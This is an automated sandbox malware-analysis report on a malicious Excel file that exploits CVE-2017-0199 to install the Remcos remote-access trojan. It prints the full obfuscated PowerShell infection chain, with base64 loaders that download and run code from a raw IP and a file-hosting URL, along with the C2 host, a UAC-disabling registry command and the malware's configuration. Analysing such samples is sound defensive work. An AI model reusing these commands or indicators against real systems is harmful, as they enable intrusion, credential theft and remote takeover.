Windows Analysis Report
OC25-11-24.xls

Overview

General Information

Sample name: OC25-11-24.xls
Analysis ID: 1562330
MD5: d923dc9f1abd640e545d1992bef70fb4
SHA1: 1c69fd2c258f80163dde3aa3b6e96ae9b4a42fa1
SHA256: 7f8c3780744584bc15d10cd35195cad98506691e51f75714f35a295e7d4ed638
Tags: cve-2017-0199, exploit, xls, user-nfsec_pl

Detection

Remcos, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3356 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3652 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3760 cmdline: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3992 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 4000 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 4084 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 2116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 3984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3172 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1652 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
    • mshta.exe (PID: 3060 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 2960 cmdline: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 2040 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 1992 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3580 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnW
k0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 3784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["newbeggin.duckdns.org:2412:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H42H13", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security

Source | Rule | Description | Author | Strings
00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i

Source | Rule | Description | Author | Strings
35.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
35.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
35.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
35.2.CasPol.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
35.2.CasPol.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]

System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1h
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3356, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = 